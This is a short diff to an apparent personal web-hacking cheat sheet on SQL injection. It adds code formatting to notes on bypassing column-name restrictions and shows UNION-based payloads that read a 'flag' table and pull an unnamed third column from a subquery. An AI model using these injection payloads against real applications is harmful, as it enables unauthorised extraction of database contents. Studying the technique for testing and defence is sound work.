Mehdi0x90/Web_Hacking/SQL Injection.md

 ```

 ### Bypass Column Names Restriction
-First of all, notice that if the original query and the table where you want to extract the flag from have the same amount of columns you might just do: 0 UNION SELECT * FROM flag
+First of all, notice that if the original query and the table where you want to extract the flag from have the same amount of columns you might just do: `0 UNION SELECT * FROM flag`

-It’s possible to access the third column of a table without using its name using a query like the following: SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;, so in an sqlinjection this would looks like:
+It’s possible to access the third column of a table without using its name using a query like the following: `SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;`, so in an sqlinjection this would looks like:
 ```bash
 # This is an example with 3 columns that will extract the column number 3
 -1 UNION SELECT 0, 0, 0, F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;